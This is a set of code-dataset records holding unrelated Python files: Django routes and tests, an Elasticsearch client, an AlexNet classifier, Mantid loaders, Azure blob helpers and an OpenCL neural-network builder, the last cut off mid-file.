+{"seq_id":"154542869","text":"from django.conf.urls import url\n\n\nurlpatterns = [\n url(r'^$', 'alarm.views.list', name='alarm-list'),\n url(r'^new/$', 'alarm.views.new', name='alarm-new'),\n url(r'^(?P[\\w\\s-]+)/remove/$', 'alarm.views.remove', name='alarm-remove'),\n url(r'^(?P[\\w\\s-]+)/event/$', 'event.views.list', name='event-list'),\n url(r'^(?P[\\w\\s-]+)/$', 'alarm.views.get', name='alarm-get'),\n]\n","sub_path":"alarm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"433502594","text":"import requests\nimport json\nimport os \nfrom dotenv import load_dotenv\n\nload_dotenv()\nsearch_elastic = os.getenv(\"search_elastic\")\nsample_search_elastic = os.getenv(\"sample_search_elastic\") \n\ndef buildScript(labels):\n script_list = []\n for i in labels:\n script_list.append(\"Math.pow((params.{} - doc['labels.{}'].value),2)\".format(i,i))\n return str(\"1 / ({})\".format(\"+\".join(script_list)))\n\n\ndef builRequestBody():\n pass\n return None\n\ndef getElasticResultByLabels(labels):\n\n headers = {\n \"content-type\": 
\"application/json\",\n }\n\n body_script = buildScript(labels)\n body = json.dumps(\n {\n \"query\" : {\n \"function_score\" : {\n \"script_score\" : {\n \"script\" : {\n \"params\": labels,\n \"source\": body_script\n }\n }\n }\n }\n }\n )\n\n print(body)\n\n result = None\n try:\n # DO THE POST REQUEST\n result = requests.post(\n search_elastic,\n data=body,\n headers=headers,\n verify=False\n ).json()\n\n except Exception as e:\n print(e)\n\n print(result)\n return result['hits']['hits']\n\n\ndef getRandomImage():\n headers = {\n \"content-type\": \"application/json\",\n }\n\n body = json.dumps({\n \"size\": 9,\n \"query\": {\n \"function_score\": {\n \"functions\": [{\n \"random_score\": {\n \"seed\": \"1501159265\"\n }\n }]\n }\n }\n })\n\n result = None\n try:\n # DO THE POST REQUEST\n result = requests.post(\n search_elastic,\n data=body,\n headers=headers,\n verify=False\n ).json()\n\n except Exception as e:\n print(e)\n\n return result['hits']['hits']\n\n\ndef getElasticResultByName(name):\n search_query = \"{sample_search_elastic}?q=place_name:{name}\".format(sample_search_elastic=sample_search_elastic, name=name)\n result = None\n try:\n result = requests.get(\n search_query\n ).json()\n\n except Exception as e:\n print(e)\n\n return result['hits']['hits']\n\ndef getElasticResultByText(text):\n search_query = \"{search_elastic}?q={text}\".format(search_elastic=search_elastic, text=text)\n result = None\n try:\n result = requests.get(\n search_query\n ).json()\n\n except Exception as e:\n print(e)\n\n return result['hits']['hits']\n","sub_path":"elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"488401994","text":"from datetime import datetime\nfrom django.test import TestCase\n\nfrom eventex.subscriptions.models import Subscription\n\n\nclass SubscriptionModelTest(TestCase):\n\n def setUp(self):\n self.obj = Subscription(\n name='Ana',\n cpf='12345678910',\n email='email@email.com',\n phone='(00) 90000-0000'\n )\n self.obj.save()\n\n def test_create(self):\n self.assertTrue(Subscription.objects.exists())\n\n def test_created_at(self):\n self.assertIsInstance(self.obj.created_at, datetime)\n","sub_path":"eventex/subscriptions/tests/test_model_subscription.py","file_name":"test_model_subscription.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"244057637","text":"import os\nos.environ['KMP_DUPLICATE_LIB_OK']='True'\nimport urllib.request\nimport argparse\nimport sys\nimport alexnet\n#from alexnet import *\nimport cv2\nimport tensorflow as tf\nimport numpy as np\nimport caffe_classes\n#from caffe_classes import *\n\n#인자로 넘어온 것 파싱하기\n#folder인지 url인지 확인하고 default는 folder이다.\nparser = argparse.ArgumentParser(description='Classify some images.')\nparser.add_argument('-m', '--mode', choices = ['folder', 'url'], default='folder')\nparser.add_argument('-p', '--path', help='Specify a path [e.g. 
testModel]', default = 'testModel')\n\n#args = Args()\nargs = parser.parse_args(sys.argv[1:])\n\n# if the mode is folder\nif args.mode == 'folder':\n    #get testImage\n    withPath = lambda f: '{}/{}'.format(args.path,f)\n    testImg = dict((f,cv2.imread(withPath(f))) for f in os.listdir(args.path) if os.path.isfile(withPath(f)))\nelif args.mode == 'url':\n\tdef url2img(url):\n\t\t#url to image\n\t\tresp = urllib.request.urlopen(url)\n\t\t# convert the url response into an image\n\t\timage = np.asarray(bytearray(resp.read()), dtype=\"uint8\")\n\t\timage = cv2.imdecode(image, cv2.IMREAD_COLOR)\n\t\treturn image\n\ttestImg = {args.path:url2img(args.path)}\n\nif testImg.values():\n\t#some params\n\tdropoutPro = 1\n\tclassNum = 1000\n\tskip = []\n\n\t# placeholder: other tensors are fed in through this placeholder\n\timgMean = np.array([104, 117, 124], float)\n\tx = tf.placeholder(\"float\", [1, 227, 227, 3])\n\n\t# build AlexNet\n\tmodel = alexnet.alexNet(x, dropoutPro, classNum, skip)\n\tscore = model.fc3\n\tsoftmax = tf.nn.softmax(score)\n\n\t# start inference\n\twith tf.Session() as sess:\n\t\tsess.run(tf.global_variables_initializer())\n\t\tmodel.loadModel(sess)\n\n\t\t# pull each item out of testImg and classify it\n\t\tfor key,img in testImg.items():\n\t\t\t#img preprocess\n\t\t\tresized = cv2.resize(img.astype(float), (227, 227)) - imgMean\n\t\t\tmaxx = np.argmax(sess.run(softmax, feed_dict = {x: resized.reshape((1, 227, 227, 3))}))\n\t\t\t# look up the class name for maxx in caffe_classes\n\t\t\tres = caffe_classes.class_names[maxx]\n\n\t\t\tfont = cv2.FONT_HERSHEY_SIMPLEX\n\t\t\t# draw the predicted class as text on the image\n\t\t\tcv2.putText(img, res, (int(img.shape[0]/3), int(img.shape[1]/3)), font, 1, (0, 255, 0), 2)\n\t\t\tprint(\"{}: {}\\n----\".format(key,res))\n\t\t\tcv2.imshow(\"demo\", img)\n\t\t\tcv2.waitKey(0)","sub_path":"testModel.py","file_name":"testModel.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"242474345","text":"from mantid.simpleapi import *\nimport os\nimport string\n\ndef find_file(run_number):\n    \"\"\"Use Mantid to search for the given run.\n    \"\"\" \n    file_hint = str(run_number)\n    try:\n        return FileFinder.findRuns(file_hint)[0]\n    except RuntimeError:\n        message = 'Cannot find file matching hint \"%s\" on current search paths ' + \\\n                  'for instrument \"%s\"'\n        raise ValueError( message % (file_hint, config['default.instrument']))\n\ndef create_resultname(run_number, prefix='', suffix=''):\n    \"\"\"Create a string based on the run number and optional prefix and\n    suffix.
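 For example,\n    create_resultname(1234, suffix='.nxs') gives '1234.spe.nxs'\n    (prefix + run number + '.spe' + suffix).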
\n \"\"\"\n if type(run_number) == list:\n name = create_resultname(run_number[0], prefix, suffix)\n elif type(run_number) == int:\n name = prefix + str(run_number) + '.spe' + suffix\n else:\n name = os.path.basename(str(run_number))\n # Hack any instrument name off the front so the output is the same as if you give it a run number\n name = name.lstrip(string.ascii_letters)\n if (suffix is None):\n name = os.path.splitext(name)[0] + '.spe'\n else:\n name = os.path.splitext(name)[0] + '.spe' + suffix\n\n return name\n \ndef create_dataname(input):\n \"\"\"This assumes some kind of filename input and creates a workspace\n from the basename of the full file path\n \"\"\"\n return os.path.basename(input)\n\n# Keeps track of loaded data files so that they can be clean up easily\n_loaded_data = []\n\ndef clear_loaded_data():\n \"\"\"Clears any previously loaded data workspaces\n \"\"\"\n global _last_mono_file, _loaded_data\n _last_mono_file = None\n for data_ws in _loaded_data:\n mtd.deleteWorkspace(data_ws)\n _loaded_data = []\n \ndef is_loaded(filename):\n \"\"\"Returns True if the file is already loaded, false otherwise\n \"\"\"\n global _loaded_files\n data_name = create_dataname(filename)\n if data_name in _loaded_files:\n return True\n else:\n return False\n \ndef mark_as_loaded(filename):\n \"\"\"Mark a file as loaded.\n \"\"\"\n global _loaded_data\n data_name = create_dataname(filename)\n if data_name not in _loaded_data:\n logger.notice(\"Marking %s as loaded.\" % filename)\n _loaded_data.append(data_name)\n\ndef load_runs(runs, sum=True):\n \"\"\"\n Loads a list of files, summing if the required. \n \"\"\"\n if type(runs) == list:\n if len(runs) == 1:\n sum = False\n if sum == True:\n if len(runs) == 0: raise RuntimeError(\"load_runs was supplied an empty list.\")\n result_ws = load_run(runs[0])\n summed = 'summed-run-files'\n CloneWorkspace(InputWorkspace=result_ws,OutputWorkspace=summed)\n sum_files(summed, runs[1:])\n result_ws = mtd[summed]\n mark_as_loaded(summed)\n return result_ws\n else:\n loaded = []\n for r in runs:\n loaded.append(load_run(r))\n if len(loaded) == 1:\n return loaded[0]\n else:\n return loaded\n else:\n # Try a single run\n return load_run(runs)\n\ndef load_run(run_number, force=False):\n \"\"\"Loads run into the given workspace. 
\n    \n    The AddSampleLog algorithm is used to add a Filename property\n    to the resulting workspace so that it can be retrieved later\n    in the reduction chain\n\n    If force is true then the file is loaded regardless of whether\n    its workspace exists already.\n    \"\"\"\n    # If a workspace with this name exists, then assume it is to be used in place of a file\n    if str(run_number) in mtd:\n        logger.notice(\"%s already loaded as workspace.\" % str(run_number))\n        if type(run_number) == str: return mtd[run_number]\n        else: return run_number\n\n    # If it doesn't exist as a workspace assume we have to try and load a file\n    if type(run_number) == int: \n        filename = find_file(run_number)\n    elif type(run_number) == list:\n        raise TypeError('load_run() cannot handle run lists')\n    else:\n        # Check if it exists, else tell Mantid to try and \n        # find it\n        if os.path.exists(run_number):\n            filename = run_number\n        else:\n            filename = find_file(run_number)\n    \n    # The output name \n    output_name = create_dataname(filename)\n    if (not force) and (output_name in mtd):\n        logger.notice(\"%s already loaded\" % filename)\n        return mtd[output_name]\n\n    ext = os.path.splitext(filename)[1]\n    if filename.endswith(\"_event.nxs\"):\n        LoadEventNexus(Filename=filename, OutputWorkspace=output_name) \n    elif ext.startswith(\".n\"):\n        LoadNexus(Filename=filename,OutputWorkspace=output_name)\n    elif filename.endswith(\"_event.dat\"):\n        #load the events\n        LoadEventPreNexus(EventFilename=filename, OutputWorkspace=output_name) \n    else:\n        LoadRaw(Filename=filename,OutputWorkspace=output_name)\n        #LoadDetectorInfo(output_name, filename)\n\n    # Attach the filename to the workspace so that it can be retrieved later in the reduction chain\n    AddSampleLog(Workspace=output_name,LogName=\"Filename\",LogText=filename)\n    logger.notice(\"Loaded %s\" % filename)\n    return mtd[output_name]\n\ndef sum_files(accumulator, files):\n    \"\"\"\n    Sum the current workspace and a list of files, accumulating the results in the\n    given workspace\n    \"\"\"\n    if type(files) == list:\n        for filename in files:\n            temp = load_run(filename)\n            Plus(LHSWorkspace=accumulator,RHSWorkspace=temp,OutputWorkspace=accumulator)\n    else:\n        pass\n","sub_path":"Code/Mantid/scripts/Inelastic/CommonFunctions.py","file_name":"CommonFunctions.py","file_ext":"py","file_size_in_byte":5618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"40980915","text":"# coding: utf-8\r\n# -------------------------------------------------------------------------\r\n# Developed from the official Microsoft blob sample for Python\r\n# -------------------------------------------------------------------------\r\n# Requires the azure-storage-blob lib - use pip install azure-storage-blob\r\n\r\n# Import dependencies\r\nfrom azure.storage.blob import BlockBlobService, ContentSettings, AppendBlobService\r\nimport os\r\n\r\n\r\ndef criaContainerAzure(account, key, containerName):\r\n    # This method creates a container only after checking whether it already exists\r\n\r\n    blobService = BlockBlobService(account, key)\r\n\r\n    if blobService.exists(containerName):\r\n        return \"O container ja existe, impossivel de criar itens duplicados.\"\r\n\r\n    else:\r\n\r\n        blobService.create_container(containerName)\r\n\r\n        return \"Container criado com sucesso.\"\r\n\r\ndef deletaContainerAzure(account, key, containerName):\r\n    # This method deletes a container only after checking that it exists\r\n\r\n    blobService = BlockBlobService(account, key)\r\n\r\n
    if blobService.exists(containerName):\r\n\r\n        blobService.delete_container(containerName)\r\n\r\n        return \"O container foi excluido com sucesso.\"\r\n\r\n    else:\r\n\r\n        return \"O container nao especificado nao existe.\"\r\n\r\ndef criaBlobAzure(account, key, containerName, blobName, file):\r\n    # This method creates a blob only after checking that the container exists\r\n\r\n    blobService = BlockBlobService(account, key)\r\n\r\n    if blobService.exists(containerName):\r\n\r\n        blobService.create_blob_from_path(containerName, blobName, file,\r\n                                          content_settings=ContentSettings(content_type='text/csv'))\r\n\r\n        return \"Blob \" + blobName + \" criado com sucesso no container: \" + containerName + \". \\nConta de criacao: \" + account + \"\"\r\n\r\n    else:\r\n\r\n        return \"O container especificado nao existe. O blob NAO foi criado com sucesso\"\r\n\r\ndef criaBlobApendavelAzure(account, key, containerName, blobName, file):\r\n    # Not implemented\r\n\r\n    return \"Nao implementado\"\r\n\r\ndef criaBlobAzure_comPasta(account, key, containerName, blobName, file, folder):\r\n    # This method creates a blob inside a folder only after checking that the container exists\r\n\r\n    blobService = BlockBlobService(account, key)\r\n\r\n    if blobService.exists(containerName):\r\n\r\n        blobService.create_blob_from_path(containerName, folder+\"/\"+blobName, file,\r\n                                          content_settings=ContentSettings(content_type='text/csv'))\r\n\r\n        return \"Blob \" + blobName + \" criado com sucesso no container: \" + containerName + \". \\nConta de criacao: \" + account + \"\"\r\n\r\n    else:\r\n\r\n        return \"O container especificado nao existe. O blob NAO foi criado com sucesso\"\r\n\r\ndef criaBlobAzure_multiplosArquivos(account, key, containerName, folder):\r\n    # This method uploads every file in a folder\r\n\r\n    blobService = BlockBlobService(account, key)\r\n\r\n    files = os.listdir(folder)\r\n\r\n    if blobService.exists(containerName):\r\n\r\n        for name in files:\r\n\r\n            blobService.create_blob_from_path(containerName, os.path.basename(name), folder + \"\\\\\" + name,\r\n                                              content_settings=ContentSettings(content_type='text/csv'))\r\n\r\n            print(folder + \"\\\\\" + name + \"| Carregado no blob\")\r\n\r\n        return \"Multiplos arquivos criados no blob | Criado no container: \" + containerName + \"\"\r\n\r\n    else:\r\n\r\n        return \"O container especificado nao existe. O blob NAO foi criado com sucesso\"\r\n\r\ndef deletaBlobAzure(account, key, containerName, blobName):\r\n    # This method deletes a blob only after checking that the container exists\r\n\r\n    blobService = BlockBlobService(account, key)\r\n\r\n    if blobService.exists(containerName):\r\n\r\n        blobService.delete_blob(containerName, blobName)\r\n\r\n        return \"Blob: \" + blobName + \"| Deletado com sucesso\"\r\n\r\n    else:\r\n\r\n        return \"O container especificado nao existe. O blob NAO foi criado com sucesso\"\r\n\r\ndef baixaBlobAzure(account, key, containerName, blobName, caminho):\r\n    # Downloads a specific blob from a specific container\r\n\r\n    blobService = BlockBlobService(account, key)\r\n\r\n    if blobService.exists(containerName):\r\n\r\n        blobService.get_blob_to_path(containerName, blobName, caminho+\"/\"+blobName)\r\n\r\n        return \"Blob: \" + blobName + \"| Criado com sucesso\"\r\n\r\n    else:\r\n\r\n        return \"O container especificado nao existe. 
O blob nao foi baixado com sucesso\"\r\n\r\ndef listarBlobAzure(account, key, containerName):\r\n    # Lists every blob in a container\r\n\r\n    blobService = BlockBlobService(account, key)\r\n\r\n    if blobService.exists(containerName):\r\n\r\n        generator = blobService.list_blobs(containerName)\r\n\r\n        listaBlobs = \"\"\r\n\r\n        for blob in generator:\r\n\r\n            print(blob.name)\r\n\r\n            listaBlobs = listaBlobs + str(blob.name) + \"|\"\r\n\r\n        print(\"Lista com todos os blobs nesse container.\")\r\n\r\n        return listaBlobs\r\n\r\n    else:\r\n\r\n        blobService.create_container(containerName)\r\n\r\n        return \"O container citado nao existe.\"\r\n\r\n","sub_path":"azureBlobUtils.py","file_name":"azureBlobUtils.py","file_ext":"py","file_size_in_byte":5151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"191696803","text":"import django\nimport pytest\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.signals import user_logged_in\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.test import Client\nfrom django.utils import timezone\n\nfrom mcod.users.models import Token, get_token_expiration_date\n\nUser = get_user_model()\n\n\n@pytest.mark.django_db\ndef test_user_create(inactive_user):\n    usr = User.objects.get(email=inactive_user.email)\n    assert usr.id == inactive_user.id\n    assert usr.last_login is None\n    assert usr.state == 'pending'\n\n\n@pytest.mark.django_db\ndef test_last_login(inactive_user):\n    now = timezone.now()\n    user_logged_in.send(User, request=None, user=inactive_user)\n    usr = User.objects.get(email=inactive_user.email)\n    assert now < usr.last_login\n\n\n@pytest.mark.django_db\ndef test_email_unique():\n    with pytest.raises(django.core.exceptions.ValidationError) as e:\n        User.objects.create_user('aaa@example.com', 'Britenet.1')\n        User.objects.create_user('aaa@example.com', 'Britenet.1')\n    assert 'email' in e.value.message_dict\n\n\n@pytest.mark.django_db\ndef test_is_active(active_user):\n    assert active_user.state == 'active'\n    assert active_user.is_active is True\n\n\n@pytest.mark.django_db\ndef test_admin_panel_access_flag(active_user):\n    assert active_user.system_role == 'user'\n\n    active_user.is_superuser = True\n    assert active_user.system_role == 'staff'\n\n    active_user.is_superuser = False\n    active_user.is_staff = True\n    assert active_user.system_role == 'staff'\n\n\n@pytest.mark.django_db\ndef test_check_session_valid(mocker):\n    usr = User.objects.create_user('aaa@example.com', 'Britenet.1')\n    assert usr.check_session_valid(None) is False\n    assert usr.check_session_valid('aaa') is False\n\n    mocker.patch('mcod.users.models.decode_jwt_token', return_value={'user': {}})\n    assert usr.check_session_valid('aaa') is False\n\n    mocker.patch('mcod.users.models.decode_jwt_token', return_value={'user': {'session_key': 1234}})\n    assert usr.check_session_valid('aaa') is False\n\n    mocker.patch('mcod.users.models.decode_jwt_token', return_value={'user': {'session_key': 1234}})\n    mocker.patch('mcod.users.models.session_cache.get', return_value={})\n    assert usr.check_session_valid('aaa') is False\n\n    mocker.patch('mcod.users.models.decode_jwt_token', return_value={'user': {'session_key': 1234}})\n    mocker.patch('mcod.users.models.session_cache.get', return_value={'_auth_user_hash': 'aaaaa'})\n    assert usr.check_session_valid('aaa') is False\n\n    mocker.patch('mcod.users.models.decode_jwt_token', return_value={'user': {'session_key': 1234}})\n    mocker.patch('mcod.users.models.session_cache.get', 
return_value={'_auth_user_hash': 'aaaaa', '_auth_user_id': '0'})\n assert usr.check_session_valid('aaa') is False\n\n mocker.patch('mcod.users.models.decode_jwt_token', return_value={'user': {'session_key': 1234}})\n mocker.patch('mcod.users.models.session_cache.get',\n return_value={'_auth_user_hash': 'aaaaaa', '_auth_user_id': str(usr.id)})\n assert usr.check_session_valid('aaa') is False\n\n mocker.patch('mcod.users.models.decode_jwt_token', return_value={'user': {'session_key': 1234}})\n mocker.patch('mcod.users.models.session_cache.get',\n return_value={'_auth_user_hash': usr.get_session_auth_hash(), '_auth_user_id': str(usr.id)})\n mocker.patch('mcod.users.models.constant_time_compare', return_value=False)\n assert usr.check_session_valid('aaa') is False\n\n mocker.patch('mcod.users.models.decode_jwt_token', return_value={'user': {'session_key': 1234}})\n mocker.patch('mcod.users.models.session_cache.get',\n return_value={'_auth_user_hash': usr.get_session_auth_hash(), '_auth_user_id': str(usr.id)})\n mocker.patch('mcod.users.models.constant_time_compare', return_value=True)\n assert usr.check_session_valid('aaa') is True\n\n\n@pytest.mark.django_db\ndef test_tokens(active_user):\n assert active_user.tokens.count() == 0\n\n email_token1 = active_user.email_validation_token\n password_reset_token1 = active_user.password_reset_token\n\n assert email_token1 != password_reset_token1\n assert active_user.tokens.count() == 2\n\n token_obj = Token.objects.get(token=email_token1)\n now = timezone.now()\n token_obj.expiration_date = now\n token_obj.save()\n assert token_obj.is_valid is False\n\n email_token2 = active_user.email_validation_token\n assert email_token1 != email_token2\n assert active_user.tokens.count() == 3\n\n email_token3 = active_user.email_validation_token\n assert email_token3 == email_token2\n assert active_user.tokens.count() == 3\n\n token = Token.objects.create(user=active_user, token_type=0)\n assert token.is_valid is True\n assert active_user.tokens.count() == 4\n\n email_token4 = active_user.email_validation_token\n assert token.token == email_token4\n assert email_token3 != email_token4\n\n exp_date = get_token_expiration_date().date()\n\n assert token.expiration_date.date() == exp_date\n\n\n@pytest.mark.django_db\nclass TestLogin(object):\n\n def test_admin_can_login_to_admin_panel(self, admin_user):\n client = Client()\n response = client.get(\"/\")\n assert response.status_code == 302\n assert response.url == '/login/?next=/'\n client.login(email=admin_user.email, password=\"Britenet.1\")\n response = client.get(\"/\")\n assert response.status_code == 200\n\n def test_editor_can_login_to_admin_panel(self, editor_user):\n client = Client()\n response = client.get(\"/\")\n assert response.status_code == 302\n assert response.url == '/login/?next=/'\n client.login(email=editor_user.email, password=\"Britenet.1\")\n response = client.get(\"/\")\n assert response.status_code == 200\n\n def test_active_user_cant_login_to_admin_panel(self, active_user):\n client = Client()\n response = client.get(\"/\")\n assert response.status_code == 302\n assert response.url == '/login/?next=/'\n client.login(email=active_user.email, password=\"Britenet.1\")\n response = client.get(\"/\")\n assert response.status_code == 302\n\n\n@pytest.mark.django_db\ndef test_user_manager_create_superuser():\n superuser = User.objects.create_superuser(None, \"superadmin@test.pl\", \"password\")\n assert superuser.email == \"superadmin@test.pl\"\n assert superuser.is_staff\n assert 
superuser.is_superuser\n assert superuser.state == 'active'\n assert str(superuser) == \"superadmin@test.pl\"\n\n\n@pytest.mark.django_db\ndef test_user_soft_delete(active_user):\n u = active_user\n u.delete()\n assert u.is_removed is True\n assert User.objects.get(id=active_user.id)\n\n\n@pytest.mark.django_db\ndef test_user_unsafe_delete(active_user):\n u = active_user\n u.delete(soft=False)\n with pytest.raises(ObjectDoesNotExist):\n User.objects.get(id=active_user.id)\n","sub_path":"mcod/users/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":6937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"242544397","text":"import os\nos.environ['PYOPENCL_COMPILER_OUTPUT'] = '1' # show opencl compiler output\nimport numpy as np\nimport pyopencl as cl\nimport pyopencl.tools\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton\nfrom PyQt5 import QtCore\n\ndef _in_range(value, low, high):\n\treturn (value >= low) and (value <= high)\n\ndef _check_type(*types):\n\tdef check(method):\n\t\tdef wrapper(self, *args, **kwargs):\n\t\t\tif len(types) != len(args):\n\t\t\t\traise Exception(\"Unequal types and arguments size.\")\n\t\t\tfor index, arg in enumerate(args):\n\t\t\t\tif not isinstance(arg, types[index]):\n\t\t\t\t\traise Exception('Invalid argument type. Expected \"{0}\" but \"{1}\" found.'.format(types[index].__name__, type(arg).__name__))\n\t\t\treturn method(self, *args, **kwargs)\n\t\treturn wrapper\n\treturn check\n\nclass NumpyArray:\n\tdef __init__(self, dtype):\n\t\tself.dtype = dtype\n\t\tself.data = np.empty((100,)).astype(self.dtype)\n\t\tself.capacity = 100\n\t\tself.size = 0\n\t\t\n\tdef update(self, row):\n\t\tfor r in row:\n\t\t\tself.add(r)\n\n\tdef add_empty(self):\n\t\tself.update(np.empty((1,)).astype(self.dtype))\n\n\tdef add(self, x):\n\t\tif self.size == self.capacity:\n\t\t\tself.capacity *= 2\n\t\t\tnew_data = np.empty((self.capacity,)).astype(self.dtype)\n\t\t\tnew_data[:self.size] = self.data\n\t\t\tself.data = new_data\n\n\t\tself.data[self.size] = x\n\t\tself.size += 1\n\n\tdef finalize(self):\n\t\tself.capacity = self.size\n\t\tself.data.resize((self.size,))\n\t\treturn self.data\n\nclass OpenClType:\n\tdef __init__(self, ctx, name, dtype):\n\t\tself.dtype = dtype\n\t\tself.dtype, self.ctype = self.__register_type(ctx.devices[0], dtype, name)\n\n\tdef __register_type(self, device, dtype, name):\n\t\tnew_dtype, ctype = pyopencl.tools.match_dtype_to_c_struct(device, name, dtype)\n\t\tpyopencl.tools.get_or_register_dtype(name, new_dtype)\n\t\tprint('Register type with name \"{name}\" successfully done:\\n\\n{ctype}'.format(name = name, ctype = ctype))\n\t\treturn new_dtype, ctype\n\nclass ConnectionType:\n\tExcitatory = 0\n\tInhibitory = 1\n\nclass Connection:\n\tdef __init__(self, from_layer, connection_type = ConnectionType.Excitatory):\n\t\tassert (from_layer is not None)\n\t\tself.fromlayer = from_layer\n\t\tself.connection_type = connection_type\n\ndef _create_filled_item(dtype, **kwargs):\n\titem = np.empty((1,)).astype(dtype)\n\tfor key in kwargs:\n\t\titem[0][key] = kwargs[key]\n\treturn item\n\nclass Layer:\n\t\"\"\"Describe single layer of neural network\"\"\"\n\tdef __init__(self, width, threshold, synapses_quantity, height = 1, init_weights = 1., \n\t\t learning_rate = 0.005, stability_factor = 0.95):\n\t\tself.width = width\n\t\tself.height = height\n\t\tself.threshold = threshold\n\t\tassert _in_range(init_weights, 0, 1)\n\t\tself.init_weights 
= init_weights\n\t\tself.connections = []\n\t\tassert (len(synapses_quantity) <= 2)\n\t\tassert _in_range(stability_factor, 0., 1.)\n\t\tif len(synapses_quantity) == 1:\n\t\t\tself.synapses_minimum = synapses_quantity[0]\n\t\t\tself.synapses_maximum = self.synapses_minimum\n\t\telse:\n\t\t\tself.synapses_minimum, self.synapses_maximum = synapses_quantity[0], synapses_quantity[1]\n\t\tself.synapses_quantity = synapses_quantity\n\t\tself.learning_rate = learning_rate\n\t\tself.stability_factor = stability_factor\n\n\tdef addConnections(self, *connections):\n\t\tself.connections += connections\n\n\tdef build(self, network):\n\t\tself.begin = network.neurons_array.size\n\t\tself.size = self.width * self.height\n\t\tself.end = self.begin + self.size\n\t\tnetwork.layers_array.update(\n\t\t\t_create_filled_item(\n\t\t\t\tnetwork.layer_type.dtype, \n\t\t\t\tsynapses_minimum = self.synapses_minimum,\n\t\t\t\tsynapses_maximum = self.synapses_maximum,\n\t\t\t\tlearning_rate = self.learning_rate,\n\t\t\t\tstability_factor = self.stability_factor,\n\t\t\t\tthreshold = self.threshold))\n\n\t\tneurons = np.zeros(self.size).astype(network.neuron_type.dtype)\n\t\tnetwork.neurons_array.update(neurons)\n\t\tyield\n\t\tfor x in self.connections:\n\t\t\tif isinstance(x, FullConnection):\n\t\t\t\tprint('FullConnection')\n\t\t\telif isinstance(x, NeuronToNeuronConnection):\n\t\t\t\tif (x.from_layer.width != self.width) or (x.from_layer.height != self.height):\n\t\t\t\t\traise Exception(\"Layers are different\")\n\t\t\t\t# i = int(0)\n\t\t\t\t# for n in network.neurons_array[self.begin:self.end]:\n\t\t\t\t# \tn[]\n\t\t\telif isinstance(x, CircularConnection):\n\t\t\t\tprint('CircularConnection')\n\t\t\telif isinstance(x, RectangularConnection):\n\t\t\t\tprint('RectangularConnection')\n\t\tyield\n\nclass FullConnection(Connection):\n\t\"\"\"Full connection\"\"\"\n\tdef __init__(self, from_layer, connection_type = ConnectionType.Excitatory):\n\t\tsuper(FullConnection, self).__init__(from_layer, connection_type)\n\nclass NeuronToNeuronConnection(Connection):\n\t\"\"\"Neuron to neuron connection\"\"\"\n\tdef __init__(self, from_layer, connection_type = ConnectionType.Excitatory):\n\t\tsuper(NeuronToNeuronConnection, self).__init__(from_layer, connection_type)\n\nclass CircularConnection(Connection):\n\t\"\"\"Circle or ring connection\"\"\"\n\tdef __init__(self, from_layer, radius, inner_radius = int(0), connection_type = ConnectionType.Excitatory):\n\t\tsuper(CircularConnection, self).__init__(from_layer, connection_type)\n\t\tself.radius = radius\n\t\tself.inner_radius = inner_radius\n\nclass RectangularConnection(Connection):\n\t\"\"\"Rectangular connection\"\"\"\n\tdef __init__(self, from_layer, width, height, connection_type = ConnectionType.Excitatory):\n\t\tsuper(RectangularConnection, self).__init__(from_layer, connection_type)\n\t\tself.width = width\n\t\tself.height = height\n\nclass Profiler(object):\n\tdef __enter__(self):\n\t\tself.time = QtCore.QTime()\n\t\tself.time.start()\n\n\tdef __exit__(self, type, value, traceback):\n\t\tprint(\"Elapsed time: {0} msec\".format(self.time.elapsed()))\n\nclass NeuralNetwork:\n\t\"\"\"Describe whole neural network\"\"\"\n\tdef __init__(self):\n\t\tself.layers = []\n\n\tdef addLayers(self, *layers):\n\t\t\"\"\" Add layers to neural network \"\"\"\n\t\tself.layers += layers\n\n\tdef build(self):\n\t\t\"\"\" Build neural network \"\"\"\n\t\tself.ctx = cl.create_some_context()\n\t\tself.layer_type = OpenClType(self.ctx, 'Layer', np.dtype([\n\t\t (\"synapses_minimum\", 
np.uint32),\n\t\t\t (\"synapses_maximum\", np.uint32),\n\t\t\t (\"learning_rate\", np.float32),\n\t\t\t (\"stability_factor\", np.float32),\n\t\t\t (\"threshold\", np.float32)]))\n\t\tself.neuron_type = OpenClType(self.ctx, 'Neuron', np.dtype([\n\t\t\t (\"activated\", np.uint32), \n\t\t\t (\"layer_idx\", np.uint32),\n\t\t\t (\"excitatory_begin\", np.uint32),\n\t\t\t (\"excitatory_end\", np.uint32),\n\t\t\t (\"inhibitory_begin\", np.uint32),\n\t\t\t (\"inhibitory_end\", np.uint32),\n\t\t\t (\"voltage\", np.float32)]))\n\t\tself.exc_synapses_type = OpenClType(self.ctx, 'ExcitatorySynapse', np.dtype([\n\t\t\t (\"weight\", np.float32),\n\t\t\t\t (\"neuron_index\", np.uint32)]))\n\t\tself.inh_synapses_type = OpenClType(self.ctx, 'InhibitorySynapse', np.dtype([\n\t\t\t (\"neuron_index\", np.uint32)]))\n\t\tself.layers_array = NumpyArray(self.layer_type.dtype)\n\t\tself.excitatory_synapses_array = NumpyArray(self.exc_synapses_type.dtype)\n\t\tself.inhibitory_synapses_array = NumpyArray(self.inh_synapses_type.dtype)\n\t\tself.excitatory_synapses_array.add_empty()\n\t\tself.inhibitory_synapses_array.add_empty()\n\t\tself.neurons_array = NumpyArray(self.neuron_type.dtype)\n\t\tstages = []\n\t\tfor x in self.layers:\n\t\t\tstage = 